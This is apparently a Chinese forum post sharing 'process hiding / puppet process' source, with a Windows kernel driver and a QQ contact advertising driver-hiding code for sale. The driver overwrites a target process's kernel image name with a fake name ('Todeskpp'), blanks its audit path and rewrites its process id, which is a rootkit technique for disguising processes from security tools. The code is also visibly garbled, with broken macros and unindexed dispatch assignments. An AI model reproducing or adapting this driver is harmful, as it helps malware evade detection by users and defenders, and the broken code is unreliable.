开源c++进程隐藏/傀儡进程源码
另外出驱动隐藏和驱动伪装兼容全平台c++源码qq2744228667#include <ntifs.h>
#include <stdlib.h>
#define_DEVICE_NAME L"\\device\\mydevice"
#define_SYB_NAME L"\\??\\sysmblicname"
typedef struct _DATA_
{
INT vid;
INT cid;
INT pid;
}DATA, * PDATA;
//0x8 bytes (sizeof)
typedef struct _SE_AUDIT_PROCESS_CREATION_INFOs
{
struct _OBJECT_NAME_INFORMATION* ImageFileName; //0x0
}SE_INFO;
//0x10 bytes (sizeof)
typedef struct _OBJECT_NAME_INFORMATIONs
{
struct _UNICODE_STRING Name; //0x0
}OBNAME;
NTSTATUS DisPatchCreate(PDEVICE_OBJECT pDevice, PIRP pIrp)
{
DbgPrintEx(77, 0, "创建成功\n");
IoCompleteRequest(pIrp, 0);
return STATUS_SUCCESS;
}
NTSTATUS DispatchWrite(PDEVICE_OBJECT pDevice, PIRP pIrp)
{
//1: 0x440
//0:0x2e8
int offset = 0;
int nameoffset = 0;
int seinfooffset = 0;
ULONG retlen = 0;
int pid = 0;
PVOID pMes = pIrp->AssociatedIrp.SystemBuffer;
pid = ((PDATA)pMes)->pid;
DbgPrint(":%d\n", pid);
PUCHAR pFakeName = "Todeskpp";
UCHAR fkpath = {0};
PEPROCESS pEprocess;
NTSTATUS status = STATUS_SUCCESS;
int id = ((PDATA)pMes)->cid;
status = PsLookupProcessByProcessId(pid, &pEprocess);
if (NT_SUCCESS(status))
{
if (((PDATA)pMes)->vid == 0)
{
offset = 0x2e8;
nameoffset = 0x450;
seinfooffset = 0x468;
}
else
{
offset = 0x440;
nameoffset = 0x5a8;
seinfooffset = 0x5c0;
}
RtlCopyMemory((PUCHAR)pEprocess + nameoffset, pFakeName, strlen(pFakeName));
SE_INFO* sei = (PUCHAR)pEprocess + seinfooffset;
OBNAME* obn = sei->ImageFileName;
RtlZeroMemory(obn->Name.Buffer, obn->Name.Length);
RtlCopyMemory((PUCHAR)pEprocess + offset, &id, sizeof(int));
DbgPrint(":%wZ\n", obn->Name);
}
pIrp->IoStatus.Information = retlen;
pIrp->IoStatus.Status = STATUS_SUCCESS;
//表示调用者已经完成了给定I/O请求的所有处理,并将给定的IRP返回给I/O管理器
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
VOIDUnloadDriver(PDRIVER_OBJECT pDriver)
{
DbgPrint("卸载成功\n");
if (pDriver->DeviceObject)
{
UNICODE_STRING uSymblicLinkname;
RtlInitUnicodeString(&uSymblicLinkname, _SYB_NAME);
IoDeleteSymbolicLink(&uSymblicLinkname);
IoDeleteDevice(pDriver->DeviceObject);
}
}
NTSTATUS DriverEntry(
IN OUT PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
DriverObject->DriverUnload = UnloadDriver;
UNICODE_STRING uDeviceName;
UNICODE_STRING uSymbliclinkname;
PDEVICE_OBJECT pDevice;
RtlInitUnicodeString(&uDeviceName, _DEVICE_NAME);
RtlInitUnicodeString(&uSymbliclinkname, _SYB_NAME);
IoCreateDevice(DriverObject, 0, &uDeviceName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDevice);
IoCreateSymbolicLink(&uSymbliclinkname, &uDeviceName);
pDevice->Flags &= ~DO_DEVICE_INITIALIZING;
pDevice->Flags |= DO_BUFFERED_IO;
DriverObject->MajorFunction = DisPatchCreate;
DriverObject->MajorFunction = DispatchWrite;
return STATUS_SUCCESS;
}
感谢分享,很给力!~ {:mad:}{:mad:}看看
页:
[1]